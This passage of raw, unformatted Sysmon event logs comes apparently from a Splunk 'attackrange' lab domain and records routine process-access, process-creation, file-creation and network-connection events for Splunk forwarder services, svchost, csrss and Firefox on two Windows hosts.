09:16:28.329{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979784Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979783Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979782Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979781Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8BEC-6151-E779-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979780Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.329{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BEC-6151-E779-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979779Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.314{69CF5F33-8BEC-6151-E779-00000000FD01}2432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979778Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:28.141{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=442951DBA8E91D74D89ACA5AA42948AA,SHA256=58841A72428145E5F8183CBFA68D7B854F359F41C50C69098466BA43E4DC0441,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:29.826{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE96CE4EAF36D49531C926A261134192,SHA256=84B4BC4818787EC3AF9F6C6CC36F29E73BEC734C89AB39486FC6F78461E186B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979809Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.594{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE677DD36D156799D80182A33550D6B8,SHA256=43CB0067EAC67303A4C554FA050CB6D6A76229E92A4A1023CFAC6F497CB257A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:29.785{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=68720FABB76064DD213ADFE556D7D1AC,SHA256=B33CB9A5CBF02F5845BDBF41F7A08C837FC7992618990981FAF1A9494B99AF59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:29.784{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=C0DF2ABC1F340E11932BFD9D0072376A,SHA256=ECA589AB5272ED60A7413D4A5EA3C559342510B1ECBEE3EA2385B07874211FC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:29.780{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=17E61A88FE51529A08E5DF34ACC02062,SHA256=079DBF1E1AF42C5E8B175D21E2ED9F1EC7B23CE4E709E0851E34683AB94000CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:29.778{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=12702875B7BF7E42D83CC49C1628B511,SHA256=F85D8A42689248FDA1D5F6766BF807D92A78F1575698231AE70963120009152C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:29.776{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=43688FFE4C4919612277C610D16B76F8,SHA256=1C576221E2D05AD6008DF7D091DC655BADC121CA06E7E55EB8A2E2CE558C1325,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:29.774{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=50FB7E3CD0878D64494F66C68F5EFC94,SHA256=CE96D1706C3C7BA6F2CEFF3840211CBBF44223667EF4F32FE9BF605EC6E46660,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:27.707{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53435-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000979808Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.422{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=91E44BF3E9BB868AF3041DB4272743D8,SHA256=A762A255F3956C38AFBEDEDF16729C534E0E26342A083F278A9517EC50D04A23,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979807Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:26.332{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60023-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000979806Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.172{69CF5F33-8BED-6151-E879-00000000FD01}3664592C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979805Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BED-6151-E879-00000000FD01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979804Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979803Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979802Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979801Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979800Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979799Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979798Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979797Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979796Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979795Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8BED-6151-E879-00000000FD01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979794Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.016{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BED-6151-E879-00000000FD01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979793Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:16:29.001{69CF5F33-8BED-6151-E879-00000000FD01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program 